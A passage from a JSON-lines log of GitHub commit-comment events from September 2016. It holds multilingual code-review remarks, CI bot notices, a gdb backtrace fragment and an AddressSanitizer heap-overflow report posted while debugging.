0x00007f4acc8d7548 in bsccs::CcdInterface::runCrossValidation (this=0xd44a460, ccd=0xd44aef0, modelData=<optimized out>) at cyclops/CcdInterface.cpp:666\r\n#11 0x00007f4acc95c75b in runCrossValidation (this=<optimized out>) at RcppCyclopsInterface.h:55\r\n#12 cyclopsRunCrossValidationl (inRcppCcdInterface=<optimized out>) at RcppCyclopsInterface.cpp:307\r\n#13 0x00007f4acc940b6a in Cyclops_cyclopsRunCrossValidationl (inRcppCcdInterfaceSEXP=0xccb6238) at RcppExports.cpp:220\r\n```\r\n\r\nThe `nThreads=0` is peculiar.  @jreps any reason you might be asking for 0 threads in your `R` code?\r\n"}},"created_at":"2016-09-29T18:35:10Z"}
{"id":"4639111438","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19228859,"position":4,"line":0,"path":"PowerSpace/Viewer/Viewer.cpp","commit_id":"dce27e8d79d6f7f22856f0fc9bcf8c6b4fbceabf","created_at":"2016-09-29T18:35:13Z","updated_at":"2016-09-29T18:35:13Z","body":"Тут не сильно жирно unordered_map копировать?"}},"created_at":"2016-09-29T18:35:13Z"}
{"id":"4639114041","type":"CommitCommentEvent","actor":{"login":"guilhermejcgois"},"repo":{"name":"New-NC/DiscoverMovieAPI"},"payload":{"comment":{"id":19228864,"position":null,"line":null,"path":null,"commit_id":"babb4ccf78fdcfbb4377d738e5e9764d3dc2151e","created_at":"2016-09-29T18:35:37Z","updated_at":"2016-09-29T18:35:37Z","body":"Sei lá, sempre achei estranho uma classe com uma única propriedade e os comportamentos dela basicamente delegam para o comportamento do objeto dessa propriedade, por quê não ser um subtipo do tipo da propriedade então? Mas acho que podíamos analisar isso com calma, se realmente faz sentido, senão deixa assim."}},"created_at":"2016-09-29T18:35:37Z"}
{"id":"4639115010","type":"CommitCommentEvent","actor":{"login":"MAPJe71"},"repo":{"name":"dail8859/notepad-plus-plus"},"payload":{"comment":{"id":19228865,"position":106,"line":2124,"path":"PowerEditor/src/Notepad_plus.cpp","commit_id":"192d2c1d16d22da2d9054f6da40b06ff76028860","created_at":"2016-09-29T18:35:46Z","updated_at":"2016-09-29T18:35:46Z","body":"Opening curly brace at the end of line 2124 should be on the next line :)"}},"created_at":"2016-09-29T18:35:46Z"}
{"id":"4639118271","type":"CommitCommentEvent","actor":{"login":"danlamanna"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19228870,"position":50,"line":84,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:36:16Z","updated_at":"2016-09-29T18:36:16Z","body":"Again, somewhat unrelated - but is there a reason for plugins being able to manipulate `appconf`?"}},"created_at":"2016-09-29T18:36:16Z"}
{"id":"4639118579","type":"CommitCommentEvent","actor":{"login":"dgadelha"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19228872,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T18:36:19Z","updated_at":"2016-09-29T18:36:19Z","body":"Alright, keep trying.\r\nAt least I got to bootanimation and almost boot.\r\nYou, well, yet on OEM logo."}},"created_at":"2016-09-29T18:36:19Z"}
{"id":"4639122485","type":"CommitCommentEvent","actor":{"login":"yenki"},"repo":{"name":"croofec/Spark-RabbitMQ"},"payload":{"comment":{"id":19228880,"position":null,"line":null,"path":null,"commit_id":"5ed364cf8dc5803a552faa9a7fd911d958d738d4","created_at":"2016-09-29T18:36:55Z","updated_at":"2016-09-29T18:36:55Z","body":"That's great! I hope it will be merged soon"}},"created_at":"2016-09-29T18:36:55Z"}
{"id":"4639123788","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"snapcore/snap-confine"},"payload":{"comment":{"id":19228882,"position":222,"line":227,"path":"src/mount-support.c","commit_id":"43e47b35a13786aa7a7aabe1a45d78febae49aa9","created_at":"2016-09-29T18:37:09Z","updated_at":"2016-09-29T18:37:09Z","body":"s/propagatio/propagation/"}},"created_at":"2016-09-29T18:37:09Z"}
{"id":"4639127633","type":"CommitCommentEvent","actor":{"login":"sautin1"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19228890,"position":4,"line":0,"path":"PowerSpace/Viewer/Viewer.cpp","commit_id":"dce27e8d79d6f7f22856f0fc9bcf8c6b4fbceabf","created_at":"2016-09-29T18:37:47Z","updated_at":"2016-09-29T18:37:47Z","body":"Кажется, что жирно, но оправдано. У viewer'а должна быть своя копия сцены, т.к. при срабатывании скриптов будут меняться свойства некоторых объектов. При этом в editor'е эти объекты должны оставаться такими, какими их создал пользователь."}},"created_at":"2016-09-29T18:37:47Z"}
{"id":"4639128831","type":"CommitCommentEvent","actor":{"login":"Jimbomaniak"},"repo":{"name":"Jimbomaniak/7_mistery_fix"},"payload":{"comment":{"id":19228898,"position":null,"line":null,"path":null,"commit_id":"f9691f19e2733f44edab6975c752dbedb76f4f78","created_at":"2016-09-29T18:37:59Z","updated_at":"2016-09-29T18:37:59Z","body":"add condition when discriminant is less then zero"}},"created_at":"2016-09-29T18:37:59Z"}
{"id":"4639129258","type":"CommitCommentEvent","actor":{"login":"groob"},"repo":{"name":"micromdm/scep"},"payload":{"comment":{"id":19228900,"position":20,"line":53,"path":"server/transport.go","commit_id":"60d4c42a32a57213e13aa5129c881051b6c801fd","created_at":"2016-09-29T18:38:04Z","updated_at":"2016-09-29T18:38:04Z","body":"I bet this is the bug. need to use `base64.URLEncoding` instead."}},"created_at":"2016-09-29T18:38:04Z"}
{"id":"4639131839","type":"CommitCommentEvent","actor":{"login":"groob"},"repo":{"name":"micromdm/scep"},"payload":{"comment":{"id":19228906,"position":29,"line":65,"path":"server/transport.go","commit_id":"60d4c42a32a57213e13aa5129c881051b6c801fd","created_at":"2016-09-29T18:38:30Z","updated_at":"2016-09-29T18:38:30Z","body":"This is nasty but required because NDES server expects a particular order. "}},"created_at":"2016-09-29T18:38:30Z"}
{"id":"4639132018","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19228907,"position":null,"line":null,"path":null,"commit_id":"da6951b1dc9fe639c32a814131a2e23c27e49066","created_at":"2016-09-29T18:38:32Z","updated_at":"2016-09-29T18:38:32Z","body":"@Keital ,ok,sorry"}},"created_at":"2016-09-29T18:38:32Z"}
{"id":"4639132665","type":"CommitCommentEvent","actor":{"login":"zachmullen"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19228910,"position":50,"line":84,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:38:37Z","updated_at":"2016-09-29T18:38:37Z","body":"I didn't want to artificially limit plugins' power in any way. If they really wanted to muck with cherrypy's configuration, then they can do it."}},"created_at":"2016-09-29T18:38:37Z"}
{"id":"4639133641","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":19228914,"position":10,"line":23,"path":"host.lua","commit_id":"c5ce248f54695316d4603c18b7e5e485b2564d24","created_at":"2016-09-29T18:38:47Z","updated_at":"2016-09-29T18:38:47Z","body":"What? I didn't even mean to commit this. I don't remember staging it. How did it get here. :|"}},"created_at":"2016-09-29T18:38:47Z"}
{"id":"4639134257","type":"CommitCommentEvent","actor":{"login":"Desnoo"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19228917,"position":null,"line":null,"path":null,"commit_id":"c877539a65e68e7827b011e9c14eb093fc01fff8","created_at":"2016-09-29T18:38:53Z","updated_at":"2016-09-29T18:38:53Z","body":"Do they cache inside the containers o.o? "}},"created_at":"2016-09-29T18:38:53Z"}
{"id":"4639135628","type":"CommitCommentEvent","actor":{"login":"KT12"},"repo":{"name":"KT12/Udacity"},"payload":{"comment":{"id":19228920,"position":null,"line":null,"path":null,"commit_id":"5ba5e5f256c2442eaee58a72594a5b039ba1976b","created_at":"2016-09-29T18:39:07Z","updated_at":"2016-09-29T18:39:07Z","body":"Project 0 for MLND"}},"created_at":"2016-09-29T18:39:07Z"}
{"id":"4639136463","type":"CommitCommentEvent","actor":{"login":"atwice"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19228921,"position":4,"line":0,"path":"PowerSpace/Viewer/Viewer.cpp","commit_id":"dce27e8d79d6f7f22856f0fc9bcf8c6b4fbceabf","created_at":"2016-09-29T18:39:15Z","updated_at":"2016-09-29T18:39:15Z","body":"Верно. Такие места я люблю комментировать"}},"created_at":"2016-09-29T18:39:15Z"}
{"id":"4639136596","type":"CommitCommentEvent","actor":{"login":"cschneider"},"repo":{"name":"apache/karaf"},"payload":{"comment":{"id":19228922,"position":null,"line":null,"path":null,"commit_id":"63474103dac5eaaab896ce4f46bde47544f1fcb9","created_at":"2016-09-29T18:39:16Z","updated_at":"2016-09-29T18:39:16Z","body":"Simple reason :-) I had no idea that I can write RELEASE. So +1 if you want to change the urls."}},"created_at":"2016-09-29T18:39:16Z"}
{"id":"4639140922","type":"CommitCommentEvent","actor":{"login":"gitshbhts"},"repo":{"name":"Netflix/security_monkey"},"payload":{"comment":{"id":19228932,"position":null,"line":null,"path":null,"commit_id":"0c822025ade1694d4e82625b9cba0fdde40df620","created_at":"2016-09-29T18:40:01Z","updated_at":"2016-09-29T18:40:01Z","body":"please explain , what's going on above ....."}},"created_at":"2016-09-29T18:40:01Z"}
{"id":"4639141380","type":"CommitCommentEvent","actor":{"login":"alicefeng"},"repo":{"name":"alicefeng/us-food-insecurity"},"payload":{"comment":{"id":19228934,"position":null,"line":null,"path":null,"commit_id":"a5b424c927630019a80aad1ae072d643d5fbcbfa","created_at":"2016-09-29T18:40:07Z","updated_at":"2016-09-29T18:40:07Z","body":"Prematurely hit the enter key, commit message should say \"Remove unneeded file\""}},"created_at":"2016-09-29T18:40:07Z"}
{"id":"4639147524","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19228961,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-29T18:41:08Z","updated_at":"2016-09-29T18:41:08Z","body":"I introduced an error and here is the stack.\r\n\r\n```\r\n=================================================================\r\n==14072== ERROR: AddressSanitizer: heap-buffer-overflow on address 0x600e00008c69 at pc 0x829227 bp 0x7ffcb4960910 sp 0x7ffcb4960908\r\nREAD of size 1 at 0x600e00008c69 thread T0\r\n    #0 0x829226 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x829226)\r\n    #1 0x8f62f3 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x8f62f3)\r\n    #2 0x8fa614 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x8fa614)\r\n    #3 0x8fd89c (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x8fd89c)\r\n    #4 0x8dcfad (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x8dcfad)\r\n    #5 0x8dedb5 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x8dedb5)\r\n    #6 0x90bc14 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x90bc14)\r\n    #7 0x90d204 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x90d204)\r\n    #8 0x7f7052d33f44 (/lib/x86_64-linux-gnu/libc-2.19.so+0x21f44)\r\n    #9 0x406e32 (/home/travis/build/claudioandre/JohnTheRipper/run/john+0x406e32)\r\n0x600e00008c69 is located 0 bytes to the right of 73-byte region [0x600e00008c20,0x600e00008c69)\r\nallocated by thread T0 here:\r\n    #0 0x7f7054b3b41a (/usr/lib/x86_64-linux-gnu/libasan.so.0.0.0+0x1541a)\r\n    #1 0x7f7052d9a729 (/lib/x86_64-linux-gnu/libc-2.19.so+0x88729)\r\nShadow bytes around the buggy address:\r\n  0x0c023fff9130: fa fa fa fa fa fa 1mfa fa fa fa fa fa fa fa fa fa\r\n  0x0c023fff9140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n  0x0c023fff9150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n  0x0c023fff9160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n  0x0c023fff9170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c023fff9180: fa fa fa fa 00 00 00 00 00 00 00 00 00[01]fa fa\r\n  0x0c023fff9190: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n  0x0c023fff91a0: fd fd fd fd fd fd fd fd fd fd fa fa fa fa 00 00\r\n  0x0c023fff91b0: 00 00 00 00 00 00 00 01 fa fa fa fa fa fa fa fa\r\n  0x0c023fff91c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n  0x0c023fff91d0: fa fa fam fa fa fa fa fa fa fa fa fa fa fa fa fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n  Addressable:           00\r\n  Partially addressable: 01 02 03 04 05 06 07 \r\n  Heap left redzone:     fa\r\n  Heap righ redzone:     fb\r\n  Freed Heap region:     fd\r\n  Stack left redzone:    f1\r\n  Stack mid redzone:     f2\r\n  Stack right redzone:   f3\r\n  Stack partial redzone: f4\r\n  Stack after return:    f5\r\n  Stack use after scope: f8\r\n  Global redzone:        f9\r\n  Global init order:     f6\r\n  Poisoned by user:      f7\r\n  ASan internal:         fe\r\n==14072== ABORTING\r\n```"}},"created_at":"2016-09-29T18:41:08Z"}
{"id":"4639148627","type":"CommitCommentEvent","actor":{"login":"sautin1"},"repo":{"name":"team-PowerSpace/PowerSpace"},"payload":{"comment":{"id":19228965,"position":4,"line":0,"path":"PowerSpace/Viewer/Viewer.cpp","commit_id":"dce27e8d79d6f7f22856f0fc9bcf8c6b4fbceabf","created_at":"2016-09-29T18:41:19Z","updated_at":"2016-09-29T18:41:19Z","body":"Хороший совет, спасибо, добавлю коммент :)"}},"created_at":"2016-09-29T18:41:19Z"}
{"id":"4639148991","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19228969,"position":22,"line":22,"path":"src/pl/pikselke/mchw/bag/BackPack.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T18:41:22Z","updated_at":"2016-09-29T18:41:22Z","body":"@ProgrammingWizzard a nie `private static final HashMap<UUID, Inventory> backpacks = new HashMap<>();`? :)\r\n`Map` to trochę co innego."}},"created_at":"2016-09-29T18:41:22Z"}
{"id":"4639159233","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19229001,"position":69,"line":69,"path":"src/pl/pikselke/mchw/bag/BackPack.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T18:43:06Z","updated_at":"2016-09-29T18:43:06Z","body":"@ProgrammingWizzard JEDEN PLECAK = JEDEN PLIK? BOŻE NIE XD Co jak tych plecaków będzie ponad 5000? Powodzenia xD\r\n\r\nZacznij kurwa używać MySQL, wtedy zrobisz sobie obiekt `User` w którym przetrzymasz wszystkie backpacki zapisane w bazie danych np. w hashmapie i będziesz gracza ładował przy starcie. Bo zapis do `YAMLa`, wgl do plików ssie pałę."}},"created_at":"2016-09-29T18:43:06Z"}
{"id":"4639161491","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19229007,"position":null,"line":null,"path":null,"commit_id":"24455d236c6c1724cdc29b6c9add2983770513db","created_at":"2016-09-29T18:43:28Z","updated_at":"2016-09-29T18:43:28Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24455d236c6c1724cdc29b6c9add2983770513db-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T18:43:28Z"}
{"id":"4639161620","type":"CommitCommentEvent","actor":{"login":"dail8859"},"repo":{"name":"dail8859/notepad-plus-plus"},"payload":{"comment":{"id":19229008,"position":106,"line":2124,"path":"PowerEditor/src/Notepad_plus.cpp","commit_id":"192d2c1d16d22da2d9054f6da40b06ff76028860","created_at":"2016-09-29T18:43:29Z","updated_at":"2016-09-29T18:43:29Z","body":"This was a wrong commit on a branch that I quickly force-pushed to fix. So this code is not used at all."}},"created_at":"2016-09-29T18:43:29Z"}
{"id":"4639164085","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"thrill/thrill"},"payload":{"comment":{"id":19229014,"position":null,"line":null,"path":null,"commit_id":"311d66eb690b4bd813f7bd835d5da5c4b2bc69c6","created_at":"2016-09-29T18:43:54Z","updated_at":"2016-09-29T18:43:54Z","body":"Thanks :)"}},"created_at":"2016-09-29T18:43:54Z"}
{"id":"4639164400","type":"CommitCommentEvent","actor":{"login":"NiklasGollenstede"},"repo":{"name":"NiklasGollenstede/unload-tabs"},"payload":{"comment":{"id":19229016,"position":54,"line":133,"path":"main.js","commit_id":"97f3b45ebfac8f4258778dafa4c8afa23142f3b2","created_at":"2016-09-29T18:43:57Z","updated_at":"2016-09-29T18:43:57Z","body":"`findClosestNonPending` already filters that out, but you are right"}},"created_at":"2016-09-29T18:43:57Z"}
{"id":"4639164606","type":"CommitCommentEvent","actor":{"login":"kazarena"},"repo":{"name":"kc1116/json-gold"},"payload":{"comment":{"id":19229017,"position":null,"line":null,"path":null,"commit_id":"7714d7ce2de0b5d6f24c5bc128a1cddbf45da36d","created_at":"2016-09-29T18:43:59Z","updated_at":"2016-09-29T18:43:59Z","body":"@kc1116 : it's been on my list for quite a while to implement LinkedDataSignature, so I'd very much appreciate if you do it.\r\n\r\nAs I understand what's involved (https://web-payments.org/specs/source/lds2015/), first of all we need to implement URDNA2015 normalisation algorithm. This includes full compliance with the [test suite](https://github.com/json-ld/normalization) (_json-gold_ supports URDNA2012 as they retrospectively call it).\r\n\r\nHave you tried verifying the signatures produced by your code above with other canonical implementations, e.g. [PyLD](https://github.com/digitalbazaar/pyld)?\r\n"}},"created_at":"2016-09-29T18:43:59Z"}
{"id":"4639164855","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"snapcore/snap-confine"},"payload":{"comment":{"id":19229018,"position":312,"line":317,"path":"src/mount-support.c","commit_id":"43e47b35a13786aa7a7aabe1a45d78febae49aa9","created_at":"2016-09-29T18:44:02Z","updated_at":"2016-09-29T18:44:02Z","body":"Noting that MS_SLAVE is what makes this one way would make this comment clearer."}},"created_at":"2016-09-29T18:44:02Z"}
{"id":"4639165928","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19229021,"position":15,"line":14,"path":"src/pl/pikselke/mchw/listeners/PlayerJoinQuitListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T18:44:11Z","updated_at":"2016-09-29T18:44:11Z","body":"jaki `event.setMessage()`? :P w JoinEvencie jest tylko `setJoinMessage()`"}},"created_at":"2016-09-29T18:44:11Z"}
{"id":"4639168264","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19229030,"position":44,"line":44,"path":"src/pl/pikselke/mchw/scoreboard/ScoreBoardListener.java","commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T18:44:35Z","updated_at":"2016-09-29T18:44:35Z","body":"@ProgrammingWizzard `stream` jest wolny :/"}},"created_at":"2016-09-29T18:44:35Z"}
{"id":"4639170623","type":"CommitCommentEvent","actor":{"login":"xVacuum"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19229035,"position":null,"line":null,"path":null,"commit_id":"185d2606211388a2e6f069b857ceaceeab38ae5c","created_at":"2016-09-29T18:45:00Z","updated_at":"2016-09-29T18:45:00Z","body":"Żenua trochę."}},"created_at":"2016-09-29T18:45:00Z"}
{"id":"4639171558","type":"CommitCommentEvent","actor":{"login":"rubengees"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19229041,"position":null,"line":null,"path":null,"commit_id":"c877539a65e68e7827b011e9c14eb093fc01fff8","created_at":"2016-09-29T18:45:12Z","updated_at":"2016-09-29T18:45:12Z","body":"They cache nothing, I do it in\r\n\r\n```\r\ncache_directories:\r\n    - /usr/local/android-sdk-linux\r\n```\r\n\r\nSomething is still wrong with the bash comands above, I'm not very fluent in those... :D"}},"created_at":"2016-09-29T18:45:12Z"}
{"id":"4639173744","type":"CommitCommentEvent","actor":{"login":"amitkgi"},"repo":{"name":"amitkgi/repo"},"payload":{"comment":{"id":19229045,"position":1,"line":1,"path":"a","commit_id":"b152a9d4bd4c1050305b91614cbe11c7ab5db156","created_at":"2016-09-29T18:45:32Z","updated_at":"2016-09-29T18:45:32Z","body":"dasdfsdf"}},"created_at":"2016-09-29T18:45:32Z"}
{"id":"4639174113","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"snapcore/snap-confine"},"payload":{"comment":{"id":19229047,"position":361,"line":366,"path":"src/mount-support.c","commit_id":"43e47b35a13786aa7a7aabe1a45d78febae49aa9","created_at":"2016-09-29T18:45:36Z","updated_at":"2016-09-29T18:45:36Z","body":"Note that in your strace comment above, the pivot_root happened by this point, but it hasn't in the code."}},"created_at":"2016-09-29T18:45:36Z"}
{"id":"4639178633","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19229055,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T18:46:22Z","updated_at":"2016-09-29T18:46:22Z","body":"Indeed, S(4, 0) is really small. Probably won't have much of an impact."}},"created_at":"2016-09-29T18:46:22Z"}
{"id":"4639181688","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog"},"payload":{"comment":{"id":19229058,"position":null,"line":null,"path":null,"commit_id":"221e10bff43d334971d2f351038bc4f5e8f5ca88","created_at":"2016-09-29T18:46:54Z","updated_at":"2016-09-29T18:46:54Z","body":"TaskCluster: @F3real does not have permission to trigger tasks."}},"created_at":"2016-09-29T18:46:54Z"}
{"id":"4639183284","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19229065,"position":null,"line":null,"path":null,"commit_id":"9d02b80b3b20c48c73a4050aca534f46841485e8","created_at":"2016-09-29T18:47:10Z","updated_at":"2016-09-29T18:47:10Z","body":"This is wanted, since I am multiplying with the rank."}},"created_at":"2016-09-29T18:47:10Z"}
{"id":"4639187085","type":"CommitCommentEvent","actor":{"login":"rubengees"},"repo":{"name":"proxer/ProxerLibAndroid"},"payload":{"comment":{"id":19229082,"position":null,"line":null,"path":null,"commit_id":"6ca7612e584355af6db0bf4a55838997af70b3bd","created_at":"2016-09-29T18:47:49Z","updated_at":"2016-09-29T18:47:49Z","body":"@Desnoo What do you think about this? Is it safe in all cases?"}},"created_at":"2016-09-29T18:47:49Z"}
{"id":"4639187590","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"snapcore/snap-confine"},"payload":{"comment":{"id":19229085,"position":376,"line":381,"path":"src/mount-support.c","commit_id":"43e47b35a13786aa7a7aabe1a45d78febae49aa9","created_at":"2016-09-29T18:47:55Z","updated_at":"2016-09-29T18:47:55Z","body":"s/ivot root/pivot_root/"}},"created_at":"2016-09-29T18:47:55Z"}
{"id":"4639189449","type":"CommitCommentEvent","actor":{"login":"jdstrand"},"repo":{"name":"snapcore/snap-confine"},"payload":{"comment":{"id":19229091,"position":377,"line":382,"path":"src/mount-support.c","commit_id":"43e47b35a13786aa7a7aabe1a45d78febae49aa9","created_at":"2016-09-29T18:48:13Z","updated_at":"2016-09-29T18:48:13Z","body":"s/agrument/argument/"}},"created_at":"2016-09-29T18:48:13Z"}
{"id":"4639189830","type":"CommitCommentEvent","actor":{"login":"mkolodny"},"repo":{"name":"danxshap/django-rest-surveys"},"payload":{"comment":{"id":19229093,"position":21,"line":62,"path":"rest_surveys/serializers.py","commit_id":"ff227da56d36db182a574ee3b5805177de2b2bc7","created_at":"2016-09-29T18:48:16Z","updated_at":"2016-09-29T18:48:16Z","body":"@danxshap The key was that we need to order the response options by the `inline_ordering_position` field on their corresponding `question_response_option`. I'm not sure if that's possible without dealing with the intermediary model directly.\r\n\r\nThe method name `get_response_options` is the default name to use when you're working with a `SerializerMethodField`. If you'd like to change the name of the method, you just use set the `method_name` kwarg: `SerializerMethodField(method_name='<new method name>')`."}},"created_at":"2016-09-29T18:48:16Z"}
{"id":"4639191361","type":"CommitCommentEvent","actor":{"login":"danielballan"},"repo":{"name":"tacaswell/bluesky"},"payload":{"comment":{"id":19229096,"position":null,"line":null,"path":null,"commit_id":"24c8370031f221f264a62d0417518d9a37350283","created_at":"2016-09-29T18:48:31Z","updated_at":"2016-09-29T18:48:31Z","body":"This does not close #560. #560 is more general than a Gaussian, and it does one resource per stage, not one per read. Also, it exposes the insert calls to filestore which of pedagogical value. You said plainly, \"I don't care!\" which is fine, so I opened #560 to help CJ and Tim understand how filestore/detector integration works."}},"created_at":"2016-09-29T18:48:31Z"}
{"id":"4639193380","type":"CommitCommentEvent","actor":{"login":"tank0412"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19229104,"position":null,"line":null,"path":null,"commit_id":"7a3c50f66d386009671c36fde20e57a951ea30d4","created_at":"2016-09-29T18:48:51Z","updated_at":"2016-09-29T18:48:51Z","body":"What?\r\n@dgadelha\r\nAre you seriously?\r\nI passed OEM logo THREE days ago.\r\nAnd my AOSP ROM almost boot too!"}},"created_at":"2016-09-29T18:48:51Z"}
{"id":"4639198660","type":"CommitCommentEvent","actor":{"login":"Kami"},"repo":{"name":"StackStorm/st2"},"payload":{"comment":{"id":19229121,"position":5,"line":17,"path":"contrib/runners/action_chain_runner/tests/unit/test_actionchain.py","commit_id":"0f842f7d21bc1ac918187e9661da707f0f481718","created_at":"2016-09-29T18:49:42Z","updated_at":"2016-09-29T18:49:42Z","body":"Thanks, I like consistency and underscores a lot more."}},"created_at":"2016-09-29T18:49:42Z"}
{"id":"4639208717","type":"CommitCommentEvent","actor":{"login":"danlamanna"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229143,"position":50,"line":84,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:51:21Z","updated_at":"2016-09-29T18:51:21Z","body":"I think I disagree with this, but I'm not super concerned.\r\n\r\nPart of the goals of #1484 are to get plugin authors to stop mucking with server configs, because it leads to breakages. Also, #1484 treats each (routable) plugin as its own CherryPy application and with that comes its own per-plugin `appconf` (though this isn't exposed yet) which could potentially lead to confusion.\r\n\r\nI'm fine if it stays as is, but if there were more opinions on it, now would be the time to change it."}},"created_at":"2016-09-29T18:51:21Z"}
{"id":"4639210486","type":"CommitCommentEvent","actor":{"login":"danlamanna"},"repo":{"name":"girder/girder"},"payload":{"comment":{"id":19229151,"position":251,"line":271,"path":"girder/utility/plugin_utilities.py","commit_id":"21425d42e24d5da56d59a41dca9ebbb8e067e16a","created_at":"2016-09-29T18:51:38Z","updated_at":"2016-09-29T18:51:38Z","body":"This is redundant now, `dirs` doesn't even have to be defined."}},"created_at":"2016-09-29T18:51:38Z"}
{"id":"4639211363","type":"CommitCommentEvent","actor":{"login":"ccouzinet"},"repo":{"name":"Mylialolz/ProjectAndroid3A"},"payload":{"comment":{"id":19229153,"position":4,"line":15,"path":"app/src/main/java/com/example/antoine/projectandroid3a/PisteReseauCyclable.java","commit_id":"f19ac41194b463226071fd85b85326647e10f203","created_at":"2016-09-29T18:51:48Z","updated_at":"2016-09-29T18:51:48Z","body":"lol"}},"created_at":"2016-09-29T18:51:48Z"}
{"id":"4639211710","type":"CommitCommentEvent","actor":{"login":"tbarsballe"},"repo":{"name":"geoserver/geoserver"},"payload":{"comment":{"id":19229155,"position":18,"line":67,"path":"src/web/core/src/main/java/org/geoserver/web/data/store/WMSStoreNewPage.java","commit_id":"79fd8dba4ecef792bd0f56ce47da7b8d6dc6b0b0","created_at":"2016-09-29T18:51:52Z","updated_at":"2016-09-29T18:51:52Z","body":"This seems wrong - we are cloning to `expandedStore` but saving `savedStore`.\r\n\r\nWhen creating a WMS Cascaded store, this causes an exception \"Store name cannot be null\""}},"created_at":"2016-09-29T18:51:52Z"}
